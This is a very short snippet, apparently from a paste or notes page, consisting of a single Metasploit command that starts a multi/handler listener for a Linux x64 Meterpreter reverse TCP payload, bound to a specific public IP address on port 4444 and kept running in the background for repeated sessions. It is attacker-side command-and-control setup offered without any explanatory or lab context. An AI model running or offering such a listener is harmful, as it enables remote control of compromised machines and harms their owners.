Last updated 19 hours ago
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST 191.96.31.13; set LPORT 4444; set EXITONSESSION FALSE; exploit -j"